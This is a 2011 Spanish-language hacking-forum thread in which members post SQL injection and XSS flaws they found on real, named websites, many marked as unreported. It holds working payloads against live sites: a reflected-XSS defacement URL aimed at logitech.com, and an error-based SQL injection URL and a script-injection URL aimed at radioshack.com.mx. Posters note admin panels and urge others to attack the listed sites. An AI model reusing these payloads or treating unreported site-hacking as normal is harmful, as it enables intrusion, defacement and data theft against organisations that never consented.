Avira:
Asociacion de asegurados de Vida y retiro de la republica argentina

no confundamos por favor.

y digo lo mismo no reporten cosas que no son suyas. tss que patetico, hay va mi aporte :O

Página: [Enlace externo eliminado para invitados]
Bug:

Código: Seleccionar todo

http://www.logitech.com/es-es/search?q=%2F%27%22%3E%3Cbr%3E%3Cbr%3E%3Cstyle%3Ebody{background:black;}%3C/style%3E%3Ccenter%3E%3Ch1%3E%3Cfont%20
color=%22white%22%3EUn%20Enorme%20Saludo%20a%20la%20gente%20del%20Foro%20Indetectables.net%3Cp%3E%20by%20Michbukana!%20:O%3C/font%3E%3C/h1%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%22http://img80.imageshack.us/img80/442/logologitech.th.png%22%20%20width=
%22320%22%20height=%22320%22%20/%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3
Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
Método: XSS

[Enlace externo eliminado para invitados]
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Web: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados]

Método: XSS

Descubridor: Skillmax/Enigmatic



- Ya apenas tengo tiempo para reportar fallos.. cuando saco 5 minutos intento hacer algo, creo que antes este bug existía y lo descubrió warvector pero fue parcheado, y otra vez, aparece..


Suerte, gente.
Web:[Enlace externo eliminado para invitados]

Bug:[Enlace externo eliminado para invitados]

Método: Sql Injection

Descubridor: Spectrus

Tranquilo Enigmatic todos solemos estar ajustados a los horarios del laburo. Se
me hace raro llamarte Enigmatic.
Un saludo a todos chicos!
Web: [Enlace externo eliminado para invitados]

Fallo: [Enlace externo eliminado para invitados]

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: [Enlace externo eliminado para invitados]

Otros comentarios: No reportado y es un foro.

__________________________________________________
Web: [Enlace externo eliminado para invitados]

Fallo: [Enlace externo eliminado para invitados]

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: [Enlace externo eliminado para invitados]
Otros comentarios: Sin reportar!
WEB: [Enlace externo eliminado para invitados]

Link del error/archivo: [Enlace externo eliminado para invitados]'

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: [Enlace externo eliminado para invitados]

Estado: Reportado sin respuesta
Última edición por hdbreaker el 22 Mar 2011, 05:45, editado 1 vez en total.
Web: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados]

Panel: [Enlace externo eliminado para invitados]

Método: SQL injection

Descubridor: HD_BreaKer

Estado: Reportado pero sin respuesta
hdbreaker escribió:WEB: [Enlace externo eliminado para invitados]

Link del error/archivo: [Enlace externo eliminado para invitados]'

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: [Enlace externo eliminado para invitados]

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

http://indetectables.net/foro/viewtopic ... 6&start=60


Web: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados] ... 3C/body%3E

Método: XSS

Descubridor: SpectruS

Otros comentarios: Sin Reportar! A darle caña a esas webs! a ver si animo el post un poco xD
Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]

Método: SQL Injection

Descubridor: SpectruS

Comentarios: Es una red social para empresas, se le puede sacar buen partido, sin reportar!
Enigmatic escribió:
hdbreaker escribió:WEB: [Enlace externo eliminado para invitados]

Link del error/archivo: [Enlace externo eliminado para invitados]'

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: [Enlace externo eliminado para invitados]

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

http://indetectables.net/foro/viewtopic ... 6&start=60


Disculpa no lo he visto de todas formas le viene bien otra advertencia ya q no ha hecho nada desde tu reporte... un abrazos
WEB: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados]'

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: Reportado sin respuesta

=========================================

WEB: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados]'

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: No Reportado
WEB: [Enlace externo eliminado para invitados]

BUG: [Enlace externo eliminado para invitados]

SQL Injection:

Código: Seleccionar todo

http://www.radioshack.com.mx/subcate.ph ... +row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1
XSS Injection:

Código: Seleccionar todo

http://www.radioshack.com.mx/tiendas.php?CIUDAD='"--><script>alert(0x0000AA)</script>
Descubridor : Juh...

Metodo Utilizado: SQL Injection, XSS Injection, Encoding
1337 & culture!
Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]'

Admin Panel: No buscado

Descubridor: Spectrus.

Comentarios:
Sin reportar.
Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]'

Admin Panel: No buscado

Descubridor: Deck.

Comentarios: Sin reportar.
Imagen

Volver a “Auditoria Web”